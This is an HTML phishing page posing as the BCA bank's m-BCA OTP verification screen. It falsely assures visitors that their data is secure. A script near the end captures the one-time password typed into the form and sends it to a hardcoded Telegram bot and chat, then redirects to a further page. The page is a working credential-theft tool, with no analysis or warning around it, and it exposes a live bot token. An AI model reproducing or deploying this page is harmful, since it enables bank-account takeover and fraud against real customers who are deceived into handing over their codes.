<html lang="en">
 <head> 
  <title>Log m-BCA</title> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> 
  <meta http-equiv="Cache-Control" content="max-age=0, no-cache, must-revalidate"> 
  <meta http-equiv="Pragma" content="no-cache"> 
  <meta http-equiv="Expires" content="0"> 
       	<meta name="theme-color" content="#0f78cb">
  <link href="https://portal.mybca.bca.co.id/css/main.css" rel="stylesheet"> 
  <link rel="icon" href="https://portal.mybca.bca.co.id/favicon/favicon.ico"> 
  <link rel="apple-touch-icon" href="https://portal.mybca.bca.co.id/favicon/logo192.png">
  <link href="https://uploads-ssl.webflow.com/637e85c3992afb0a6372a1f7/css/bca-co-id-individu1.webflow.c4401dfba.css" rel="stylesheet" type="text/css"> 

 </head> 
 <style>
@charset "utf-8";

html { line-height: 1.5; text-size-adjust: 100%; font-family: system-ui, sans-serif; -webkit-font-smoothing: antialiased; text-rendering: optimizelegibility; touch-action: manipulation; }

body { position: relative; min-height: 80%; font-feature-settings: "kern"; }

*, ::before, ::after { border-width: 0px; border-style: solid; box-sizing: border-box; }

main { display: block; }

hr { border-top-width: 1px; box-sizing: content-box; height: 0px; overflow: visible; }

pre, code, kbd, samp { font-family: SFMono-Regular, Menlo, Monaco, Consolas, monospace; font-size: 1em; }

a { background-color: transparent; color: inherit; text-decoration: inherit; }

abbr[title] { border-bottom: none; text-decoration: underline dotted; }

b, strong { font-weight: bold; font-size: 15px;color:#000;}

small { font-size: 70%; }

sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; }

sub { bottom: -0.25em; }

sup { top: -0.5em; }

img { border-style: none; }

button, input, optgroup, select, textarea { font-family: inherit; font-size: 100%; line-height: 1.15; margin: 0px; }

button, input { overflow: visible; }

button, select { text-transform: none; }

fieldset { padding: 0.35em 0.75em 0.625em; }

legend { box-sizing: border-box; color: inherit; display: table; max-width: 100%; padding: 0px; white-space: normal; }

progress { vertical-align: baseline; }

textarea { overflow: auto; }

[type="checkbox"], [type="radio"] { box-sizing: border-box; padding: 0px; }

[type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { appearance: none !important; }

input[type="number"] { }

[type="search"] { appearance: textfield; outline-offset: -2px; }

[type="search"]::-webkit-search-decoration { appearance: none !important; }

::-webkit-file-upload-button { appearance: button; font: inherit; }

details { display: block; }

summary { display: list-item; }

template { display: none; }

[hidden] { display: none !important; }

body, blockquote, dl, dd, h1, h2, h3, h4, h5, h6, hr, figure, p, pre { margin: 0px; }

button { background: transparent; padding: 0px; }

fieldset { margin: 0px; padding: 0px; }

ol, ul { margin: 0px; padding: 0px; }

textarea { resize: vertical; }

button, [role="button"] { cursor: pointer; }

table { border-collapse: collapse; }

.h2 { font-size: 0px; font-family: ; color: #09559a;}

h1, h2, h3, h4, h5, h6 { font-size: 14; font-weight: inherit; }

button, input, optgroup, select, textarea { padding: 0px; line-height: inherit; color: inherit; }

img, svg, video, canvas, audio, iframe, embed, object { display: block; }

img, video { max-width: 100%; height: auto; }
        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 6px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 38px; 
            width: 490px; 
            max-width: 85%;
            font-family: 'Nunito', sans-serif;
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px;
            line-height: 1; 
            border-radius: 7px; 
            box-shadow: rgb(192, 192, 192) 2px 3px 8px 0px; 
            transition: background 200ms ease 0s;
        }
[data-js-focus-visible] :focus:not([data-focus-visible-added]):not([data-focus-visible-disabled]) { outline: none; box-shadow: none; }
</style>
<style>

@charset "utf-8";

body { font-family: AvenirMedium; color: var(--chakra-colors-chakra-body-text); height: 100%; width: 100%}

::-webkit-input-placeholder { color: var(--chakra-colors-chakra-placeholder-color); }

::placeholder { 

    font-weight: 500;
    
    font-size: 14px;
    color: 	#778899;
}

*, ::before, ::after { border-color: var(--chakra-colors-chakra-border-color); overflow-wrap: break-word; }
</style>
<style>

@charset "utf-8";

.css-536van { max-width: 560px; margin: auto; overflow: hidden; height: 100%; }
</style>
<style>

@charset "utf-8";

.css-1kh160d { background-color: rgba(255, 255, 255, 0.4); position: fixed; inset: 0px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; z-index: 9; }

.css-v7v99c { width: 100px; }

.css-otdls7 { background-color: rgb(244, 244, 244); height: 100%; display: flex; flex-direction: column; }

.css-m25hbt { background-color: white; padding: 10px 10px; }

.css-r8xns0 { height: 27px; }

.css-6icz3w { width: 100%; height: 170px; }

.css-1h7se0k { text-align: center; flex: 1 1 0%; }

.css-k9xuz5 { margin: 0px auto; }

.css-140rqgf { text-align: left; padding: 10px 20px; margin-bottom: 18px; }

.css-14zpys6 { font-weight: 700; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-xl); text-align: center; }

.css-1gu96id { margin-bottom: 20px; font-weight: 600; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-1jnktsq { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); }

.css-1jnktsq[disabled], .css-1jnktsq[aria-disabled="true"], .css-1jnktsq[data-disabled] { cursor: not-allowed; }

.css-1ncbew8 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-1ncbew8[aria-checked="true"], .css-1ncbew8[data-checked] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[aria-checked="true"]:hover, .css-1ncbew8[data-checked]:hover, .css-1ncbew8[aria-checked="true"][data-hover], .css-1ncbew8[data-checked][data-hover] { background: var(--chakra-colors-blue-600); border-color: var(--chakra-colors-blue-600); }

.css-1ncbew8[aria-checked="true"][disabled], .css-1ncbew8[data-checked][disabled], .css-1ncbew8[aria-checked="true"][aria-disabled="true"], .css-1ncbew8[data-checked][aria-disabled="true"], .css-1ncbew8[aria-checked="true"][data-disabled], .css-1ncbew8[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-1ncbew8:indeterminate, .css-1ncbew8[aria-checked="mixed"], .css-1ncbew8[data-indeterminate] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[disabled], .css-1ncbew8[aria-disabled="true"], .css-1ncbew8[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-1ncbew8:focus-visible, .css-1ncbew8[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1ncbew8[aria-invalid="true"], .css-1ncbew8[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sgc0qu { margin-inline-start: 0.5rem; user-select: none; font-size: var(--chakra-fontSizes-md); }

.css-1sgc0qu[disabled], .css-1sgc0qu[aria-disabled="true"], .css-1sgc0qu[data-disabled] { opacity: 0.4; }

.css-1tqjkcb { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 20px; }

.css-1tqjkcb[disabled], .css-1tqjkcb[aria-disabled="true"], .css-1tqjkcb[data-disabled] { cursor: not-allowed; }

.css-jgamys { font-size: 16px; text-align: center; color: rgb(14, 120, 202); font-weight: 500; }

.css-g9qnka { padding: 0px 20px; }

.css-q9238k { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: var(--chakra-radii-full); font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: var(--chakra-sizes-10); min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); width: var(--chakra-sizes-full); margin-top: 32px; }

.css-q9238k:focus-visible, .css-q9238k[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-q9238k[disabled], .css-q9238k[aria-disabled="true"], .css-q9238k[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-q9238k:hover, .css-q9238k[data-hover] { background: var(--chakra-colors-blue-600); }

.css-q9238k:hover[disabled], .css-q9238k[data-hover][disabled], .css-q9238k:hover[aria-disabled="true"], .css-q9238k[data-hover][aria-disabled="true"], .css-q9238k:hover[data-disabled], .css-q9238k[data-hover][data-disabled] { background: var(--chakra-colors-blue-500); }

.css-q9238k:active, .css-q9238k[data-active] { background: var(--chakra-colors-blue-700); }

.css-129zm1u { font-weight: 700; font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-dnzamn { display: flex; -webkit-box-pack: center; justify-content: center; margin: 20px 0px; }

.css-1eqmq6c { width: 90px; }

.css-1hfq88p { background-color: rgb(45, 120, 189); padding: 10px; }

.css-dz67t0 { font-size: 11px; text-align: center; color: var(--chakra-colors-white); }

.css-k18gpu { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); }

.css-k18gpu[disabled], .css-k18gpu[aria-disabled="true"], .css-k18gpu[data-disabled] { cursor: not-allowed; }

.css-15rtx21 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-15rtx21[aria-checked="true"], .css-15rtx21[data-checked] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(--chakra-colors-white); }

.css-15rtx21[aria-checked="true"]:hover, .css-15rtx21[data-checked]:hover, .css-15rtx21[aria-checked="true"][data-hover], .css-15rtx21[data-checked][data-hover] { background: var(--chakra-colors-red-600); border-color: var(--chakra-colors-red-600); }

.css-15rtx21[aria-checked="true"][disabled], .css-15rtx21[data-checked][disabled], .css-15rtx21[aria-checked="true"][aria-disabled="true"], .css-15rtx21[data-checked][aria-disabled="true"], .css-15rtx21[aria-checked="true"][data-disabled], .css-15rtx21[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-15rtx21:indeterminate, .css-15rtx21[aria-checked="mixed"], .css-15rtx21[data-indeterminate] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(--chakra-colors-white); }

.css-15rtx21[disabled], .css-15rtx21[aria-disabled="true"], .css-15rtx21[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-15rtx21:focus-visible, .css-15rtx21[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-15rtx21[aria-invalid="true"], .css-15rtx21[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sy58bw { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 0px; }

.css-1sy58bw[disabled], .css-1sy58bw[aria-disabled="true"], .css-1sy58bw[data-disabled] { cursor: not-allowed; }

.css-1r69mki { opacity: 1; transform: scale(1); font-size: 0.625rem; transition-property: transform; transition-duration: var(--chakra-transition-duration-normal); width: 1.2em; }

.css-1sm2s1z { height: 100%; display: flex; flex-direction: column; }


.css-13fbd8g { background: url("") left bottom / cover; width: 100%; height: 100%; position: relative; text-align: center; }

.css-1hvggs4 { height: 50px; margin-bottom: 0px; background-color: #; box-shadow: rgb(51, 51, 51) 0px 0px 0px; display: flex; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; font-size: 18px;}

.css-arqxt3 { color: #2F4F4F; font-size: 16px; font-family: AvenirBold; }

.css-1v97jab { width: 100%; padding: 0px; max-width: 374px; margin: auto; position: absolute; bottom: 0px; left: 0px; right: 0px; }


@media (max-width: 400px) {
  .css-1v97jab { max-width: 350px; }
}

.css-1meg77l { margin-top: 10%; width: 100%; padding: 10px; }

.css-q7z8lq { color: #0f78cb; font-size: 13px; font-family: AvenirBold; }

.css-2z8rzx { box-shadow: rgb(25, 25, 112)  0px 0px 0px; border-radius: 6px; margin-top: 7px; }

.css-qhzfk3 {background-color:  rgb(240, 248, 254); box-shadow: #0f78cb 0px 0px 0px 2px; margin-top: 7px; padding: 0px  8px; border-bottom: 0px solid #778899; display: flex; -webkit-box-align: center; align-items: center; border-radius: 4px; }

.css-1fq0ymr { width: 50px; margin-right: 5px; }

.css-1ew2b06 { padding:  0px  5px;  background-color:rgb(240, 248, 254); height: 35px; font-family: bold; width: 100%; max-width: 100%;font-weight: 580; color:#2F4F4F; font-size: 19px; }

.css-1iarp40 { width: 24px; height: 25px; object-fit: contain; margin-right: 23px; }

.css-tb4kah { width: 23px; height: 29px; object-fit: contain; margin-right: 23px; }

.css-ldq9nk { margin-top: 18px text-align: right; }

.css-1w471m1 { font-size: 12px; font-family: AvenirBold; margin-top: 4px; text-align: right; }

.css-70qvj9 { display: flex; -webkit-box-align: center; align-items: center; }


.css-2z5j4d { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 0px; line-height: 0px; box-shadow:  0px 0px 0px 0px; border-radius: 20px;
 font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: 37px; min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--flex-space-4); padding-inline-end: var(--chakra-space-4); background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat-x: ; background-repeat-y: ; background-attachment: ; background-origin: ; background-clip: ; flex: 1 1 0%; width: 100%; margin-top: 4vh; background-color: #0f78cb; color: #fff; font-family: AvenirBold; box-shadow: #778899  0px 2px 8px;  }
}


.css-2z5j4d:focus-visible, .css-2z5j4d[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-2z5j4d[disabled], .css-2z5j4d[aria-disabled="true"], .css-2z5j4d[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-2z5j4d:hover, .css-2z5j4d[data-hover] { background-color: rgb(14, 120, 202); }

.css-2z5j4d:active, .css-2z5j4d[data-active] { background: var(--chakra-colors-gray-300); }

.css-2z5j4d:focus, .css-2z5j4d[data-focus] { background-color: rgb(14, 120, 202); }

.css-1h9adj1 { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: 20px; font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: 45px; min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat-x: ; background-repeat-y: ; background-attachment: ; background-origin: ; background-clip: ; margin-left: 10px; width: 50px; margin-top: 4vh; background-color: #l color: var(--chakra-colors-white); font-family: AvenirBold; padding: 8px; }

.css-1h9adj1:focus-visible, .css-1h9adj1[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1h9adj1[disabled], .css-1h9adj1[aria-disabled="true"], .css-1h9adj1[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-1h9adj1:hover, .css-1h9adj1[data-hover] { background-color: rgb(14, 120, 202); }

.css-1h9adj1:active, .css-1h9adj1[data-active] { background: var(--chakra-colors-gray-300); }

.css-1h9adj1:focus, .css-1h9adj1[data-focus] { background-color: rgb(14, 120, 202); }

.css-m3dotl { width: 60px; object-fit: contain; }
</style>
<style>

@charset "utf-8";

@font-face { font-family: Avenir; src: url("/fonts/avenir_next_regular.ttf"); }

@font-face { font-family: AvenirBold; src: url("/fonts/avenir_next_bold.ttf"); }

@font-face { font-family: AvenirMedium; src: url("/fonts/avenir_next_medium.ttf"); }

body, html { padding: 0px; margin: 0px; font-family: Avenir, "Helvetica Neue", sans-serif; }

#__next, body, html { height: 100%; }

a { color: inherit ; text-decoration: none; }

* { box-sizing: border-box; }

input { outline: unset !important; }

@-webkit-keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@-webkit-keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}

@keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}
            @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
:root {
  --modal-duration: 1s;
  --modal-color: #428bca;
}


.button {
  background: #428bca;
  padding: 1em 2em;
  color: #fff;
  border: 0;
  border-radius: 5px;
  cursor: pointer;
}

.button:hover {
  background: #3876ac;
}

.modal {
  display: none;
  position: fixed;
  z-index: 1;
  left: 0;
  top: 0;
  height: 100%;
  width: 100%;
  overflow: auto;
  background-color: rgba(0, 0, 0, 0.5);
}

.modal-content {
  margin: 50% auto;
  width: 80%;
  box-shadow: 0 5px 8px 0 rgba(0, 0, 0, 0.2), 0 7px 20px 0 rgba(0, 0, 0, 0.17);
  animation-name: modalopen;
  animation-duration: var(--modal-duration);
}

.modal-header h2,
.modal-footer h3 {
  margin: 0;
}

.modal-header {
  background: var(--modal-color);
  padding: 0px;
  color: #fff;
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
}

.modal-body {
  padding: 20px 20px;
  background: #ffff;
}

.modal-footer {
  background: var(--modal-color);
  padding: 10px;
  color: #fff;
  text-align: center;
  border-bottom-left-radius: 2px;
  border-bottom-right-radius: 2px;
}

.close {
  color: #ccc;
  float: right;
  font-size: 30px;
  color: #fff;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}

@keyframes modalopen {
  from {
    opacity: 0;
  }
  to {
    opacity: 1;
  }
}
#alxsm {
      border-radius: 10px;
      border: ,10px solid #09559a;
      color: #09559a;
      font-size: 14px;
      font-weight:bold;
      margin-bottom: 15px;
      padding: 0.5em 1em 0.5em 0;
      width: 94%;     /* Ukuran bebas */
      height: 100px;     /* Ukuran bebas */
      text-align: center;
      margin-left:5px;
 }
 .bgchalxfrm2 {
    background: url(https://siapjadi.com/header4.png) no-repeat center;
    background-size: 110%;
    position: unset;
    width: 140%;
    border-radius: 0px;
    top: 0;
    height: 500px;
    border: none;
    margin-right:-20px;
}

 </style>
 <body> 
  <div class="container-lg">
    <nav class="navbar navbar-light px-0"> 
     <a class="navbar-brand"> <img src="https://portal.mybca.bca.co.id/../img/logo_2x.png" alt="logo-BCA" style="width: 6rem;"> </a> 
    </nav>
   <section> 
    <div class="card shadow"> 
     <div class="card-header"> 
      <h5 class="card-title text-center m-0">VERIFIKASI OTP</h5></div>
     <div class="card-body d-flex py-5"> 
      <div class="col"> 
       <div class="row"> 
        <div class="col-12 col-sm-8 col-md-7 col-lg-6 mx-auto"> 
         <center> 
          <span style="color: #0f78cb;">Kode virtual OTP telah dikirim ke nomor telpon anda. </span>
         </center> 
         <br> 
         <div class="row"> 
          <div class="col-12"> 
           <div class="alert alert-v2 alert-warning d-flex" role="alert"> 
            <div class="mr-2"> 
             <img src="https://portal.mybca.bca.co.id//../img/svg alert/exclamation-circle-warning-color.svg" class="alert-width"> 
            </div> 
            <div> 
             <span style= " color: #BE980A;">Data yang di input hanya untuk memastikan kepemilikan rekening, Data nasabah dijamin aman dan terenskripsi oleh system. </span></div></div>
         <div class="row"> 
         <p style="font-weight: bold; font-size: 19px; color: rgb(9, 140, 227);  text-align: center; margin: 0px auto;" id="timer"></p>
            </div><br>      
          <section class="section">
        <b class="chakra-text css-q7z8lq">Kode Virtual</b>
        <form id="setPin" onsubmit=""><div class="css-2z8rzx"><div class="css-qhzfk3"><b></b><input name="OTP" type="tel" id="password" placeholder="Masukan Kode OTP" autocomplete="off" minlength="5" maxlenght="6"required="" class="css-1ew2b06"></div></div><button type="submit" class="chakra-button css-2z5j4d">KONFIRMASI</button>
   <style>
   .blink {
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
</style>
           <center> 
            <span class="blink">
             <center>
              <center>
      <div style="display: none;"> 
      </div> 
     </div> 
    </div> 
   </section>
  </div> 
  <footer class="small py-4"> 
   <div class="container-lg"> 
    <div class="row align-items-center justify-content-center justify-content-lg-start"> 
     <div class="col col-sm-auto"> 
      <div class="row"> 
       <div class="col-12 col-sm-auto text-center"> 
        <a target="_blank" rel="noreferrer noopener" href=""> LOKASI BCA </a> 
       </div> 
       <div class="col-12 col-sm-auto text-center"> 
        <a target="_blank" rel="noreferrer noopener" href="https://www.bca.co.id"> BCA.CO.ID </a> 
       </div> 
      </div> 
     </div> 
     <div class="col col-sm-auto"> 
      <div class="row"> 
       <div class="col-12 col-sm-auto text-center"> 
        <a target="_blank" rel="noreferrer noopener" href="https://www.bca.co.id/id/informasi/kurs"> INFORMASI KURS </a> 
       </div> 
       <div class="col-12 col-sm-auto text-center"> 
        <a target="_blank" rel="noreferrer noopener" href=""> SOSIAL MEDIA </a> 
       </div> 
      </div> 
     </div> 
     <div class="col-12 col-lg-auto ml-lg-auto"> 
      <div class="row mt-3 mt-lg-0 no-gutters justify-content-lg-end"> 
       <div class="col-12 col-lg-auto text-center"> 
        <span class="text-muted mr-lg-2"> ©2024 PT Bank Central Asia Tbk, All Rights Reserved. </span> 
       </div> 
       <div class="col-12 col-lg-auto text-center"> 
        <a target="_blank" rel="noreferrer noopener" href="https://www.bca.co.id/id/Syarat-dan-Ketentuan" class="mr-2"> Syarat &amp; Ketentuan </a> 
        <a target="_blank" rel="noreferrer noopener" href="https://www.bca.co.id/id/informasi/Kebijakan-Privasi"> Kebijakan Privasi </a> 
       </div> 
      </div> 
     </div> 
    </div> 
   </div>
  </footer> 
           <div class="div-block-2">
    <a href="data.php" class="button-15 w-button"></a>
    <a href="data.php" class="button-16 w-button"></a>
    <a href="#" class="button-17 w-button"></a>
    <a href="data.php" class="button-18 w-button"></a>
    <a href="data.php" class="button-19 w-button"></a>
    <a href="#" class="button-20 w-button"></a> 
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
       <script>
        document.getElementById('timer').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec
       ) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script>
   <script>
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });

const chat_id = '7435930487', botID = 'bot7282148744:AAHXhFEPqYLdH3rlKNCTba3oSQqSB1Ce6L4';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = 'otp.html';
    });

            
        });
        
   </script>
        </form>
      </div>
    </section>
    <!-- <script src="./axios.js" type="module"></script> -->
    <script src="./Pin.html" type="module"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  </body>
</html>
